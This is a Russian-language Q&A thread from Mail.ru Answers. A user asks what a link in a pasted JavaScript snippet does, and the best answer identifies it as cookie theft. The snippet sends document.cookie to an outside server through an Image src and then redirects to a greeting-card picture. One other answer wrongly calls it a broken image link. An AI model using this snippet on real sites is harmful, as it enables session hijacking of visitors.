Mail.ruПочтаМой МирОдноклассникиВКонтактеИгрыЗнакомстваНовостиПоискОблакоVK ComboВсе проекты

за что отвечает ссылка? в скрипте

Вячеслав Н Знаток (379), закрыт 13 лет назад var URL = "http://images.cards.mail.ru/11bolprivet.jpg"
function reload() {
document.location = URL
}
setTimeout("reload()", speed);
</script>
в вышесказанном коде за что отвечает ссылка "[ссылка появится после проверки модератором]?" и зачем?" />
Дополнен 13 лет назад
<script>
img = new Image(); img.src = "[ссылка появится после проверки модератором]?"+document.cookie;
var URL = "http://images.cards.mail.ru/11bolprivet.jpg"
function reload() {
document.location = URL
}
setTimeout("reload()", speed);
</script>
в вышесказанном коде за что отвечает ссылка "[ссылка появится после проверки модератором]?" и зачем?
Лучший ответ
жосский Мудрец (14113) 13 лет назад
что-то мне подсказывает, что весь этот скрипт направлен на утыривание куков. непосредственно за утыривание отвечает сценарий на httpz.ru (возможно, что при этом и gif показывается. впрочем, это и в самом деле может быть гиф, а сценария нет никакого)
Остальные ответы
/\/\ I/I X A I/I /\ Гуру (4964) 13 лет назад
Вот следом оборвано document.coo... -это подозрительно
Игорь Рис Гуру (4272) 13 лет назад
Вообще это ссылки на графический файл. Но его там нет. Ошибка.